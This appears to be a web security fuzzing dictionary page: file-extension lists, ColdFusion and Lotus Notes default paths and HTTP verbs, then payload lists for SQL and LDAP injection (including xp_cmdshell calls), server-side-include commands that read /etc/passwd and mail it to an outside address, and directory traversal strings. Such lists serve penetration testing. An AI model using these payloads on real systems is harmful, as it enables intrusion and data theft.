.kpx<br />
.kpz<br />
.l<br />
.l6t<br />
.laccdb<br />
.lbl<br />
.lbx<br />
.lcd<br />
.lcf<br />
.lcm<br />
.ldif<br />
.lex<br />
.lgc<br />
.lgf<br />
.lgh<br />
.lgi<br />
.lgl<br />
.lib<br />
.lif<br />
.livereg<br />
.liveupdate<br />
.lix<br />
.llb<br />
.lms<br />
.lmx<br />
.lnt<br />
.loc<br />
.lp7<br />
.lrf<br />
.lrs<br />
.lrx<br />
.lsf<br />
.lsl<br />
.lsp<br />
.lsr<br />
.lst<br />
.lsu<br />
.lvm<br />
.lw4<br />
.ly<br />
.m<br />
.mag<br />
.mai<br />
.map<br />
.masseffectprofile<br />
.mat<br />
.mbb<br />
.mbf<br />
.mbg<br />
.mbl<br />
.mbp<br />
.mbx<br />
.mc1<br />
.mc9<br />
.mcd<br />
.md<br />
.mdb<br />
.mdc<br />
.mdf<br />
.mdl<br />
.mdm<br />
.mdn<br />
.mdt<br />
.mdx<br />
.mdz<br />
.mem<br />
.menc<br />
.met<br />
.mex<br />
.mfo<br />
.mfp<br />
.mgc<br />
.mls<br />
.mm<br />
.mmap<br />
.mmc<br />
.mmf<br />
.mmp<br />
.mnc<br />
.mng<br />
.mnk<br />
.mno<br />
.mny<br />
.mobi<br />
.moho<br />
.mosaic<br />
.mox<br />
.mpd<br />
.mpj<br />
.mpp<br />
.mpt<br />
.mpx<br />
.mpz<br />
.mq4<br />
.ms10<br />
.mth<br />
.mtw<br />
.mud<br />
.muf<br />
.mw<br />
.mwf<br />
.mws<br />
.mwx<br />
.mxd<br />
.myd<br />
.myi<br />
.nb<br />
.nc<br />
.ndf<br />
.ndk<br />
.ndx<br />
.net<br />
.neta<br />
.nfo<br />
.nitf<br />
.nmind<br />
.not<br />
.notebook<br />
.np<br />
.npl<br />
.npt<br />
.nrl<br />
.ns2<br />
.ns3<br />
.ns4<br />
.nsf<br />
.ntx<br />
.numbers<br />
.nvl<br />
.nyf<br />
.oab<br />
.obj<br />
.odb<br />
.odf<br />
.odp<br />
.ods<br />
.odx<br />
.oeaccount<br />
.ofc<br />
.ofm<br />
.oft<br />
.ofx<br />
.omcs<br />
.omp<br />
.ond<br />
.one<br />
.oo3<br />
.opf<br />
.opx<br />
.or2<br />
.or3<br />
.or4<br />
.or5<br />
.or6<br />
.org<br />
.orx<br />
.otf<br />
.otl<br />
.otln<br />
.ots<br />
.out<br />
.ov2<br />
.ova<br />
.ovf<br />
.p96<br />
.p97<br />
.pab<br />
.paf<br />
.pan<br />
.pbd<br />
.pc<br />
.pcap<br />
.pcb<br />
.pcr<br />
.pd4<br />
.pd5<br />
.pdas<br />
.pdb<br />
.pdd<br />
.pdm<br />
.pds<br />
.pdx<br />
.peb<br />
.pec<br />
.pep<br />
.pex<br />
.pfc<br />
.pfl<br />
.phb<br />
.phm<br />
.pi<br />
.pis<br />
.pjx<br />
.pka<br />
.pkb<br />
.pkh<br />
.pks<br />
.pkt<br />
.pln<br />
.plw<br />
.pmo<br />
.pmr<br />
.pnproj<br />
.pnpt<br />
.pns<br />
.pnt<br />
.pod<br />
.poi<br />
.pos<br />
.postal<br />
.pot<br />
.potm<br />
.potx<br />
.pp2<br />
.ppf<br />
.pps<br />
.ppsx<br />
.ppt<br />
.pptm<br />
.pptx<br />
.prc<br />
.pre<br />
.prf<br />
.prj<br />
.prm<br />
.prs<br />
.psa<br />
.psf<br />
.psm<br />
.pst<br />
.ptb<br />
.ptf<br />
.ptk<br />
.ptm<br />
.ptn<br />
.ptt<br />
.ptz<br />
.pvl<br />
.pwd<br />
.pxj<br />
.pxl<br />
.q07<br />
.q08<br />
.q09<br />
.q3d<br />
.qbw<br />
.qdat<br />
.qdf<br />
.qdfm<br />
.qel<br />
.qfx<br />
.qif<br />
.qpb<br />
.qpf<br />
.qph<br />
.qpm<br />
.qpw<br />
.qrp<br />
.qsd<br />
.ral<br />
.rbt<br />
.rcd<br />
.rcg<br />
.rdb<br />
.rdf<br />
.rdx<br />
.ref<br />
.ret<br />
.rf1<br />
.rfa<br />
.rfo<br />
.rge<br />
.rgn<br />
.rgo<br />
.rmuf<br />
.rnq<br />
.rod<br />
.rog<br />
.roi<br />
.rou<br />
.rpp<br />
.rpt<br />
.rrt<br />
.rsc<br />
.rsd<br />
.rsw<br />
.rte<br />
.rvt<br />
.rwg<br />
.rzb<br />
.s85<br />
.saf<br />
.sam07<br />
.sar<br />
.sav<br />
.sbd<br />
.sbf<br />
.sbq<br />
.sbt<br />
.sca<br />
.scf<br />
.sch<br />
.sdb<br />
.sdc<br />
.sdf<br />
.sdp<br />
.sdq<br />
.sds<br />
.sen<br />
.seo<br />
.seq<br />
.ser<br />
.sgml<br />
.sgn<br />
.shp<br />
.shs<br />
.shx<br />
.skc<br />
.skv<br />
.skx<br />
.sle<br />
.slk<br />
.slp<br />
.snapfireshow<br />
.sonic<br />
.soundpack<br />
.spo<br />
.sps<br />
.spub<br />
.spv<br />
.sq<br />
.sqd<br />
.sql<br />
.sqlite<br />
.sqr<br />
.sta<br />
.stc<br />
.stf<br />
.stk<br />
.stl<br />
.stm<br />
.stp<br />
.str<br />
.stt<br />
.stw<br />
.styk<br />
.stykz<br />
.swk<br />
.sxc<br />
.sxi<br />
.sy3<br />
.t01<br />
.t02<br />
.t03<br />
.t04<br />
.t05<br />
.t06<br />
.t07<br />
.t08<br />
.t09<br />
.t2<br />
.t3001<br />
.tax2008<br />
.tax2009<br />
.tb<br />
.tbk<br />
.tbl<br />
.tcc<br />
.tcx<br />
.tda<br />
.tdl<br />
.tdm<br />
.tdt<br />
.te<br />
.te3<br />
.teacher<br />
.tef<br />
.tet<br />
.tfa<br />
.tfd<br />
.tfrd<br />
.tjp<br />
.tk3<br />
.tkfl<br />
.tmw<br />
.tol<br />
.topc<br />
.tpb<br />
.tps<br />
.tr3<br />
.tra<br />
.trd<br />
.trk<br />
.trs<br />
.trx<br />
.tst<br />
.tsv<br />
.ttk<br />
.txa<br />
.txd<br />
.txf<br />
.uccapilog<br />
.ud<br />
.udb<br />
.udeb<br />
.uds<br />
.ulf<br />
.ulz<br />
.update<br />
.upoi<br />
.usr<br />
.uvf<br />
.uwl<br />
.val<br />
.vbpf1<br />
.vcd<br />
.vce<br />
.vcf<br />
.vcs<br />
.vdb<br />
.vdx<br />
.vfs<br />
.vi<br />
.vip<br />
.vle<br />
.vlg<br />
.vmt<br />
.voi<br />
.vok<br />
.vrd<br />
.vscontent<br />
.vsx<br />
.vtx<br />
.vxml<br />
.w02<br />
.wab<br />
.wb1<br />
.wb2<br />
.wb3<br />
.wdb<br />
.wdq<br />
.wea<br />
.wfd<br />
.wfm<br />
.wgp<br />
.wgt<br />
.windowslivecontact<br />
.wjr<br />
.wk1<br />
.wk2<br />
.wk3<br />
.wk4<br />
.wk5<br />
.wke<br />
.wki<br />
.wks<br />
.wku<br />
.wlmp<br />
.wmdb<br />
.wor<br />
.wpc<br />
.wpf<br />
.wpo<br />
.wq1<br />
.wq2<br />
.wtb<br />
.wtr<br />
.xbk<br />
.xdb<br />
.xdp<br />
.xds<br />
.xef<br />
.xem<br />
.xfd<br />
.xfo<br />
.xft<br />
.xl<br />
.xlc<br />
.xlgc<br />
.xlr<br />
.xls<br />
.xlsb<br />
.xlsm<br />
.xlsx<br />
.xlt<br />
.xltm<br />
.xltx<br />
.xlw<br />
.xmcd<br />
.xml<br />
.xmlper<br />
.xmpz<br />
.xpg<br />
.xpj<br />
.xpm<br />
.xpt<br />
.xrp<br />
.xsl<br />
.xslt<br />
.xsn<br />
.xtm<br />
.xtp<br />
.xxd<br />
.yam<br />
.zap<br />
.zdb<br />
.zdc<br />
.zix<br />
.zmc<br />
.zpl<br />
.{pb<br />
.~hm<br />
</pre><br />
<br />
=== Compressed File Types - (Update: 16 March 2010 - Total Statements: 187) ===<br />
<pre><br />
# Compressed File Types - (Update: 16 March 2010 - Total Statements: 187)<br />
# adam.muntner@quietmove.com<br />
# creative commons<br />
<br />
.0<br />
.000<br />
.7z<br />
.a00<br />
.a01<br />
.a02<br />
.ace<br />
.ain<br />
.alz<br />
.apz<br />
.ar<br />
.arc<br />
.arh<br />
.ari<br />
.arj<br />
.ark<br />
.axx<br />
.b64<br />
.ba<br />
.bh<br />
.boo<br />
.bz<br />
.bz2<br />
.bzip<br />
.bzip2<br />
.c00<br />
.c01<br />
.c02<br />
.car<br />
.cb7<br />
.cbr<br />
.cbt<br />
.cbz<br />
.cp9<br />
.cpgz<br />
.cpt<br />
.dar<br />
.dd<br />
.deb<br />
.dgc<br />
.dist<br />
.ecs<br />
.efw<br />
.epi<br />
.f<br />
.fdp<br />
.gca<br />
.gz<br />
.gzi<br />
.gzip<br />
.ha<br />
.hbc<br />
.hbc2<br />
.hbe<br />
.hki<br />
.hki1<br />
.hki2<br />
.hki3<br />
.hpk<br />
.hyp<br />
.ice<br />
.ipg<br />
.ipk<br />
.ish<br />
.j<br />
.jar.pack<br />
.jgz<br />
.jic<br />
.kgb<br />
.lbr<br />
.lemon<br />
.lha<br />
.lnx<br />
.lqr<br />
.lz<br />
.lzh<br />
.lzm<br />
.lzma<br />
.lzo<br />
.lzx<br />
.md<br />
.mint<br />
.mou<br />
.mpkg<br />
.mzp<br />
.oar<br />
.p7m<br />
.pack.gz<br />
.package<br />
.pae<br />
.pak<br />
.paq6<br />
.paq7<br />
.paq8<br />
.par<br />
.par2<br />
.pbi<br />
.pcv<br />
.pea<br />
.pet<br />
.pf<br />
.pim<br />
.pit<br />
.piz<br />
.pkg<br />
.pup<br />
.puz<br />
.pwa<br />
.qda<br />
.r0<br />
.r00<br />
.r01<br />
.r02<br />
.r03<br />
.r1<br />
.r2<br />
.r30<br />
.rar<br />
.rev<br />
.rk<br />
.rnc<br />
.rp9<br />
.rpm<br />
.rte<br />
.rz<br />
.rzs<br />
.s00<br />
.s01<br />
.s02<br />
.s7z<br />
.sar<br />
.sdc<br />
.sdn<br />
.sea<br />
.sen<br />
.sfs<br />
.sfx<br />
.sh<br />
.shar<br />
.shk<br />
.shr<br />
.sit<br />
.sitx<br />
.spt<br />
.sqx<br />
.sqz<br />
.tar<br />
.tar.gz<br />
.tar.xz<br />
.taz<br />
.tbz<br />
.tbz2<br />
.tg<br />
.tgz<br />
.tlz<br />
.tlzma<br />
.txz<br />
.tz<br />
.uc2<br />
.uha<br />
.vem<br />
.vsi<br />
.wad<br />
.war<br />
.wot<br />
.xef<br />
.xez<br />
.xmcdz<br />
.xpi<br />
.xx<br />
.xz<br />
.y<br />
.yz<br />
.z<br />
.z01<br />
.z02<br />
.z03<br />
.z04<br />
.zap<br />
.zfsendtotarget<br />
.zip<br />
.zipx<br />
.zix<br />
.zoo<br />
.zpi<br />
.zz</pre><br />
<br />
=== Uncommon Data File Extensions (Update: 16 March 2010 - Total Statements: 284) ===<br />
<pre><br />
# Uncommon Data File Extensions (Update: 16 March 2010 - Total Statements: 284)<br />
# adam.muntner@quietmove.com<br />
# creative commons<br />
<br />
.3me<br />
.3pe<br />
.4dl<br />
.8xk<br />
.^^^<br />
.aao<br />
.ab2<br />
.aca<br />
.accdb<br />
.acf<br />
.acg<br />
.agd<br />
.an1<br />
.anme<br />
.arc<br />
.arh<br />
.ast<br />
.att<br />
.aw<br />
.bafl<br />
.bdf<br />
.bfx<br />
.bjo<br />
.bld<br />
.blg<br />
.btf<br />
.btif<br />
.btr<br />
.cct<br />
.cdb<br />
.cdd<br />
.cdf<br />
.cdp<br />
.cdr<br />
.chk<br />
.ckd<br />
.cl2<br />
.cl4<br />
.clb<br />
.clix<br />
.clm<br />
.cmbl<br />
.contact<br />
.cpi<br />
.cpmz<br />
.csv<br />
.cwz<br />
.cxt<br />
.daf<br />
.dat<br />
.data<br />
.db<br />
.dcf<br />
.ddt<br />
.dex<br />
.dif<br />
.dmsk<br />
.dnc<br />
.dpx<br />
.dsd<br />
.dt1<br />
.dt2<br />
.dta<br />
.e00<br />
.ec0<br />
.edf<br />
.eep<br />
.efx<br />
.enc<br />
.enw<br />
.epw<br />
.est<br />
.et<br />
.eta<br />
.ev3<br />
.exif<br />
.exp<br />
.fbl<br />
.fdb<br />
.fid<br />
.fol<br />
.gdb<br />
.gen<br />
.gnp<br />
.gpi<br />
.gpx<br />
.hcp<br />
.hdf<br />
.hmt<br />
.hsk<br />
.htg<br />
.id2<br />
.ii<br />
.img<br />
.ink<br />
.ins<br />
.irr<br />
.irx<br />
.iw<br />
.jdb<br />
.jnt<br />
.job<br />
.jrprint<br />
.kmz<br />
.lbx<br />
.lex<br />
.lgf<br />
.lgl<br />
.lib<br />
.liveupdate<br />
.lnt<br />
.lst<br />
.m<br />
.masseffectprofile<br />
.mat<br />
.mbb<br />
.mdb<br />
.mem<br />
.menc<br />
.met<br />
.mmf<br />
.mng<br />
.mpd<br />
.mpp<br />
.ms10<br />
.muf<br />
.mw<br />
.mwf<br />
.mwx<br />
.nc<br />
.ndx<br />
.nfo<br />
.not<br />
.ns2<br />
.ns3<br />
.ns4<br />
.ntx<br />
.numbers<br />
.ods<br />
.oeaccount<br />
.omcs<br />
.or2<br />
.or3<br />
.or4<br />
.or5<br />
.orx<br />
.out<br />
.ov2<br />
.ovf<br />
.paf<br />
.pbd<br />
.pcr<br />
.pdb<br />
.pdx<br />
.peb<br />
.pec<br />
.pfc<br />
.pis<br />
.pln<br />
.pnpt<br />
.pns<br />
.pnt<br />
.pos<br />
.postal<br />
.pps<br />
.ppsx<br />
.ppt<br />
.pptm<br />
.pptx<br />
.pre<br />
.prf<br />
.psa<br />
.psf<br />
.pst<br />
.ptz<br />
.q07<br />
.q3d<br />
.qbw<br />
.qdat<br />
.qdf<br />
.qfx<br />
.qpf<br />
.qpw<br />
.qsd<br />
.rcd<br />
.rdx<br />
.ref<br />
.rmuf<br />
.roi<br />
.rrt<br />
.rvt<br />
.rwg<br />
.saf<br />
.sam07<br />
.sbd<br />
.sbf<br />
.sbq<br />
.sbt<br />
.sdb<br />
.sdc<br />
.sdf<br />
.sds<br />
.ser<br />
.sgn<br />
.shs<br />
.skc<br />
.slk<br />
.sonic<br />
.soundpack<br />
.spo<br />
.sql<br />
.stf<br />
.stl<br />
.stm<br />
.sy3<br />
.t08<br />
.t09<br />
.t2<br />
.tax2009<br />
.tdl<br />
.tdt<br />
.te<br />
.teacher<br />
.tmw<br />
.tol<br />
.trk<br />
.trs<br />
.trx<br />
.tsv<br />
.uccapilog<br />
.ud<br />
.udeb<br />
.uds<br />
.update<br />
.uwl<br />
.val<br />
.vcf<br />
.vdb<br />
.vfs<br />
.vip<br />
.vle<br />
.vlg<br />
.vxml<br />
.w02<br />
.wab<br />
.wb1<br />
.wb3<br />
.wdq<br />
.wfd<br />
.wfm<br />
.windowslivecontact<br />
.wk1<br />
.wk2<br />
.wk3<br />
.wk4<br />
.wk5<br />
.wke<br />
.wks<br />
.wlmp<br />
.wpc<br />
.wpo<br />
.wq1<br />
.wq2<br />
.wtr<br />
.xbk<br />
.xdb<br />
.xds<br />
.xfd<br />
.xl<br />
.xlgc<br />
.xlr<br />
.xls<br />
.xlsx<br />
.xltm<br />
.xltx<br />
.xml<br />
.xmpz<br />
.xsl<br />
.xsn<br />
.xtm<br />
.xtp<br />
.xxd<br />
.{pb<br />
.~hm<br />
</pre><br />
<br />
=== Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65) ===<br />
<pre><br />
# Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)<br />
# adam.muntner@quietmove.com<br />
# creative commons<br />
<br />
CFIDE/Administrator/<br />
CFIDE/Administrator/index.cfm<br />
CFIDE/Administrator/login.cfm<br />
CFIDE/Administrator/Application.cfm<br />
CFIDE/Application.cfm<br />
CFIDE/adminapi/<br />
CFIDE/adminapi/Application.cfm<br />
CFIDE/adminapi/administrator.cfc<br />
CFIDE/adminapi/base.cfc<br />
CFIDE/adminapi/customtags/<br />
CFIDE/adminapi/customtags/l10n.cfm<br />
CFIDE/adminapi/customtags/resources<br />
CFIDE/adminapi/customtags/resources/<br />
CFIDE/adminapi/datasource.cfc<br />
CFIDE/adminapi/debugging.cfc<br />
CFIDE/adminapi/eventgateway.cfc<br />
CFIDE/adminapi/extensions.cfc<br />
CFIDE/adminapi/mail.cfc<br />
CFIDE/adminapi/runtime.cfc<br />
CFIDE/adminapi/security.cfc<br />
CFIDE/adminapi/_datasource/<br />
CFIDE/adminapi/_datasource/formatjdbcurl.cfm<br />
CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm<br />
CFIDE/adminapi/_datasource/geturldefaults.cfm<br />
CFIDE/adminapi/_datasource/setdsn.cfm<br />
CFIDE/adminapi/_datasource/setmsaccessregistry.cfm<br />
CFIDE/adminapi/_datasource/setsldatasource.cfm<br />
CFIDE/classes/<br />
CFIDE/classes/cf-j2re-win.cab<br />
CFIDE/classes/cfapplets.jar<br />
CFIDE/classes/images<br />
CFIDE/componentutils/<br />
CFIDE/componentutils/Application.cfm<br />
CFIDE/componentutils/cfcexplorer.cfc<br />
CFIDE/componentutils/cfcexplorer_utils.cfm<br />
CFIDE/componentutils/componentdetail.cfm<br />
CFIDE/componentutils/componentdoc.cfm<br />
CFIDE/componentutils/componentlist.cfm<br />
CFIDE/componentutils/gatewaymenu<br />
CFIDE/componentutils/gatewaymenu/<br />
CFIDE/componentutils/gatewaymenu/menu.cfc<br />
CFIDE/componentutils/gatewaymenu/menunode.cfc<br />
CFIDE/componentutils/login.cfm<br />
CFIDE/componentutils/packagelist.cfm<br />
CFIDE/componentutils/utils.cfc<br />
CFIDE/componentutils/_component_cfcToHTML.cfm<br />
CFIDE/componentutils/_component_cfcToMCDL.cfm?<br />
CFIDE/componentutils/_component_style.cfm<br />
CFIDE/componentutils/_component_utils.cfm<br />
CFIDE/debug/<br />
CFIDE/debug/images/<br />
CFIDE/debug/includes/<br />
CFIDE/images/<br />
CFIDE/images/skins/<br />
CFIDE/install.cfm<br />
CFIDE/installers/<br />
CFIDE/installers/CFMX7DreamWeaverExtensions.mxp<br />
CFIDE/installers/CFReportBuilderInstaller.exe<br />
CFIDE/probe.cfm<br />
CFIDE/scripts/<br />
CFIDE/scripts/css/<br />
CFIDE/scripts/xsl/<br />
CFIDE/wizards/<br />
CFIDE/wizards/common/<br />
CFIDE/wizards/common/utils.cfc</pre><br />
<br />
=== All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31) ===<br />
<pre><br />
# All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)<br />
# adam.muntner@quietmove.com<br />
# creative commons<br />
<br />
OPTIONS<br />
GET<br />
HEAD<br />
POST<br />
PUT<br />
DELETE<br />
TRACE<br />
CONNECT<br />
PROPFIND<br />
PROPPATCH<br />
MKCOL<br />
COPY<br />
MOVE<br />
LOCK<br />
UNLOCK<br />
VERSION-CONTROL<br />
REPORT<br />
CHECKOUT<br />
CHECKIN<br />
UNCHECKOUT<br />
MKWORKSPACE<br />
UPDATE<br />
LABEL<br />
MERGE<br />
BASELINE-CONTROL<br />
MKACTIVITY<br />
ORDERPATCH<br />
ACL<br />
PATCH<br />
SEARCH<br />
ARBITRARY<br />
</pre><br />
<br />
=== Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111) ===<br />
<pre>/852566C90012664F<br />
/admin4.nsf<br />
/admin5.nsf<br />
/admin.nsf<br />
/agentrunner.nsf<br />
/alog.nsf<br />
/a_domlog.nsf<br />
/bookmark.nsf<br />
/busytime.nsf<br />
/catalog.nsf<br />
/certa.nsf<br />
/certlog.nsf<br />
/certsrv.nsf<br />
/chatlog.nsf<br />
/clbusy.nsf<br />
/cldbdir.nsf<br />
/clusta4.nsf<br />
/collect4.nsf<br />
/da.nsf<br />
/dba4.nsf<br />
/dclf.nsf<br />
/DEASAppDesign.nsf<br />
/DEASLog01.nsf<br />
/DEASLog02.nsf<br />
/DEASLog03.nsf<br />
/DEASLog04.nsf<br />
/DEASLog05.nsf<br />
/DEASLog.nsf<br />
/decsadm.nsf<br />
/decslog.nsf<br />
/DEESAdmin.nsf<br />
/dirassist.nsf<br />
/doladmin.nsf<br />
/domadmin.nsf<br />
/domcfg.nsf<br />
/domguide.nsf<br />
/domlog.nsf<br />
/dspug.nsf<br />
/events4.nsf<br />
/events5.nsf<br />
/events.nsf<br />
/event.nsf<br />
/homepage.nsf<br />
/iNotes/Forms5.nsf/$DefaultNav<br />
/jotter.nsf<br />
/leiadm.nsf<br />
/leilog.nsf<br />
/leivlt.nsf<br />
/log4a.nsf<br />
/log.nsf<br />
/l_domlog.nsf<br />
/mab.nsf<br />
/mail10.box<br />
/mail1.box<br />
/mail2.box<br />
/mail3.box<br />
/mail4.box<br />
/mail5.box<br />
/mail6.box<br />
/mail7.box<br />
/mail8.box<br />
/mail9.box<br />
/mail.box<br />
/msdwda.nsf<br />
/mtatbls.nsf<br />
/mtstore.nsf<br />
/names.nsf<br />
/nntppost.nsf<br />
/nntp/nd000001.nsf<br />
/nntp/nd000002.nsf<br />
/nntp/nd000003.nsf<br />
/ntsync45.nsf<br />
/perweb.nsf<br />
/qpadmin.nsf<br />
/quickplace/quickplace/main.nsf<br />
/reports.nsf<br />
/sample/siregw46.nsf<br />
/schema50.nsf<br />
/setupweb.nsf<br />
/setup.nsf<br />
/smbcfg.nsf<br />
/smconf.nsf<br />
/smency.nsf<br />
/smhelp.nsf<br />
/smmsg.nsf<br />
/smquar.nsf<br />
/smsolar.nsf<br />
/smtime.nsf<br />
/smtpibwq.nsf<br />
/smtpobwq.nsf<br />
/smtp.box<br />
/smtp.nsf<br />
/smvlog.nsf<br />
/srvnam.htm<br />
/statmail.nsf<br />
/statrep.nsf<br />
/stauths.nsf<br />
/stautht.nsf<br />
/stconfig.nsf<br />
/stconf.nsf<br />
/stdnaset.nsf<br />
/stdomino.nsf<br />
/stlog.nsf<br />
/streg.nsf<br />
/stsrc.nsf<br />
/userreg.nsf<br />
/vpuserinfo.nsf<br />
/webadmin.nsf<br />
/web.nsf<br />
/.nsf/../winnt/win.ini<br />
/?Open <br />
</pre><br />
<br />
=== SQL Injection -(Update: 11 August 2009 - Total Statements: 126) ===<br />
<pre>Statement<br />
'sqlvuln<br />
'+sqlvuln<br />
sqlvuln;<br />
(sqlvuln)<br />
a' or 1=1--<br />
"a"" or 1=1--"<br />
or a = a<br />
a' or 'a' = 'a<br />
1 or 1=1<br />
a' waitfor delay '0:0:10'--<br />
1 waitfor delay '0:0:10'--<br />
declare @q nvarchar (4000) select @q =<br />
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A<br />
0<br />
031003000270000<br />
declare @s varchar(22) select @s =<br />
0x77616974666F722064656C61792027303A303A31302700 exec(@s)<br />
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)<br />
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e<br />
exec(@s)<br />
a'<br />
?<br />
' or 1=1<br />
‘ or 1=1 --<br />
x' AND userid IS NULL; --<br />
x' AND email IS NULL; --<br />
anything' OR 'x'='x<br />
x' AND 1=(SELECT COUNT(*) FROM tabname); --<br />
x' AND members.email IS NULL; --<br />
x' OR full_name LIKE '%Bob%<br />
23 OR 1=1<br />
'; exec master..xp_cmdshell 'ping 172.10.1.255'--<br />
'<br />
'%20or%20''='<br />
'%20or%20'x'='x<br />
%20or%20x=x<br />
')%20or%20('x'='x<br />
0 or 1=1<br />
' or 0=0 --<br />
" or 0=0 --<br />
or 0=0 --<br />
' or 0=0 #<br />
or 0=0 #"<br />
or 0=0 #<br />
' or 1=1--<br />
" or 1=1--<br />
' or '1'='1'--<br />
' or 1 --'<br />
or 1=1--<br />
or%201=1<br />
or%201=1 --<br />
' or 1=1 or ''='<br />
or 1=1 or ""=<br />
' or a=a--<br />
or a=a<br />
') or ('a'='a<br />
) or (a=a<br />
hi or a=a<br />
hi or 1=1 --"<br />
hi' or 1=1 --<br />
hi' or 'a'='a<br />
hi') or ('a'='a<br />
"hi"") or (""a""=""a"<br />
'hi' or 'x'='x';<br />
@variable<br />
,@variable<br />
PRINT<br />
PRINT @@variable<br />
select<br />
insert<br />
as<br />
or<br />
procedure<br />
limit<br />
order by<br />
asc<br />
desc<br />
delete<br />
update<br />
distinct<br />
having<br />
truncate<br />
replace<br />
like<br />
handler<br />
bfilename<br />
' or username like '%<br />
' or uname like '%<br />
' or userid like '%<br />
' or uid like '%<br />
' or user like '%<br />
exec xp<br />
exec sp<br />
'; exec master..xp_cmdshell<br />
'; exec xp_regread<br />
t'exec master..xp_cmdshell 'nslookup www.google.com'--<br />
--sp_password<br />
\x27UNION SELECT<br />
' UNION SELECT<br />
' UNION ALL SELECT<br />
' or (EXISTS)<br />
' (select top 1<br />
'||UTL_HTTP.REQUEST<br />
1;SELECT%20*<br />
to_timestamp_tz<br />
tz_offset<br />
&lt;&gt;"'%;)(&amp;+<br />
'%20or%201=1<br />
%27%20or%201=1<br />
%20$(sleep%2050)<br />
%20'sleep%2050'<br />
char%4039%41%2b%40SELECT<br />
&amp;apos;%20OR<br />
'sqlattempt1<br />
(sqlattempt2)<br />
|<br />
%7C<br />
*|<br />
%2A%7C<br />
*(|(mail=*))<br />
%2A%28%7C%28mail%3D%2A%29%29<br />
*(|(objectclass=*))<br />
%2A%28%7C%28objectclass%3D%2A%29%29<br />
(<br />
%28<br />
)<br />
%29<br />
&amp;<br />
%26<br />
!<br />
%21<br />
' or 1=1 or ''='<br />
' or ''='<br />
x' or 1=1 or 'x'='y<br />
/<br />
//<br />
//*<br />
*/*<br />
a' or 3=3--<br />
"a"" or 3=3--"<br />
' or 3=3<br />
‘ or 3=3 --<br />
</pre> <br />
=== SSI (Server Side Includes) - (Update: xx/xx/xx - Total Statements: 4) ===<br />
<pre>&lt;!--#exec cmd="/bin/ls /" --&gt;&lt;br/&gt;<br />
&lt;!--#exec cmd="cat /etc/passwd" --&gt;&lt;br/&gt;<br />
&lt;!--#exec cmd="find / -name *.* -print" --&gt;&lt;br/&gt;<br />
&lt;!--#exec cmd="mail Foobar@email.de &lt;mailto:Foobar@email.de&gt; &lt; cat /etc/passwd" --&gt;&lt;br/&gt;<br />
</pre> <br />
=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132) ===<br />
<pre>Statement<br />
\..\WINDOWS\win.ini<br />
\..\..\WINDOWS\win.ini<br />
\..\..\..\WINDOWS\win.ini<br />
\..\..\..\..\WINDOWS\win.ini<br />
\..\..\..\..\..\WINDOWS\win.ini<br />
\..\..\..\..\..\..\WINDOWS\win.ini<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
